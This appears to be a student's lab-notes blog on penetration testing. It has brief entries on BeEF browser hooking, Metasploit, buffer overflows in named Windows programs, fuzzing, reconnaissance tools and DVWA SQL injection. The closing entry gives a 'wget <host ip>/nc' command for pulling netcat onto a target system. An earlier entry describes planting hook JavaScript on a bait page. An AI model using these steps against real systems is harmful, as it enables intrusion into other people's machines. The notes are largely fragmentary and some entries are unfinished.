Combine Browser and Metasploit

in this time, i try to combine browser and metasploit to exploit victim.

using beef, copy the java script to web that we put as bait to the victim computer to victim computer can be connected to our computer

File exploit and Web exploit

The first computer I had to exploit the first victim, do information gathering and do exploitable 


with file exploit

Auxiliary using metasploit

search the auxiliary module with command show auxiliary at msfconsole

after that choose one of module auxiliary and to knowing set setting used command show options

after that setting the set RHOST and RPORT

and exploit

Social Engineering

Social engineering is the acquisition of information, or edicts, secret / sensitive by cheating the owner of such information. Social engineering is typically done via telephone or Internet. Social engineering is one of the methods used by hackers to gain information about the target, by requesting the information directly to the victim or others who have that information.

Social engineering concentrates on the weakest chain of computer network systems, namely humans. As we know, no computer system that does not involve human interaction. And worse, this vulnerability is universal, independent of platforms, operating systems, protocols, software or hardware. That is, each system has the same weakness in human factors. Any person who has physical access to the system is a threat, even if the person is not included in the security policy that had been developed. Other methods such as hacking, social engineering also requires preparation, even most of the work includes the preparation itself.

MSFPALOAD

exploit linux stack overflow

in this time, try to exploit linux, first must turn off the aslr

SEH Exploit Easy Chat Server Buffer Overflow method

This is a display from Easy Chat Server

Buffer Overflow BigAnt SEH

what is BigAnt??
BigAnt is instant messenger that features a 128bit encrypted messages and send files, clearly structured on-line list of users, and easier to use. BigAnt used on client computers with server computers.

Buffer Overflow VUplayer

VUPlayer

Buffer Overflow RM-MP3 Converter

in this time, i try exploit RM-MP3 converter with buffer overflow method,

prepare file which will be used as a tool to buffer overflow,

warftp with buffer overflow method

I try to exploit WARFTPD with fuzzing method.

in repair

exploit warftp

 in this time i try to exlpoit warftp
first we must search the informatioan gathering about warftp, i search using nessus

OllyDbg and installation

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries.

OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

fuzzer and fuzzing

Fuzzer is called  to application used at fuzzing process. And fuzzing is process or method used to find out a logic error and failure in a data processing applications by providing an abnormal input into an application and see the same practice and learn how to handle the exception that there.

A fuzzer basically works by sending data simultaneously and repeatedly either automatically or semi-automatic into a software for processing. Data which is input data which is usually not normal, but the data that are made specifically, such as using special characters or has the number / length of data that is not normal.

Register Memory

Register memory is memory size very small but have very high-speed access. Register used to save data instructions are being processed, while the other data and other instructions waiting to processed are in main memory.

Tugas 8

download

By Pass FBIP

open the FBIP "localhost/fbip"

MKFIFO

The function "mkfifo" can be used to create a named pipe from within a program. The signature of the function is as follows:

int mkfifo(const char *path, mode_t mode)

The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREATE|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.

Maltego

Maltego is platform to give information what we want to know about the target, can shaped infrastructure and personal, infrastructure and persona.

Maltego is a program that can be used to determine the relationships and real world links between:

• People

• Groups of people (social networks)

• Companies

• Organizations

• Web sites

• Internet infrastructure such as:

About Shodanhq

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Shodan also lets you use boolean operators (‘+’, ‘-’ and ‘|’) to include/ exclude certain terms. By default, every search term has a ‘+’ operator assigned to it.
In addition to boolean operators, there are special filters to narrow down the search results.

exploitation DVWA with SQL Ijection

first the DVWA security set at low

and than choose SQL Injection and try input user id example '1' and submit, will display an error

Revisi NC

in here i doing rectification about NC
place the file nc in the folder www 

download in target system, with command "wget <host ip>/nc"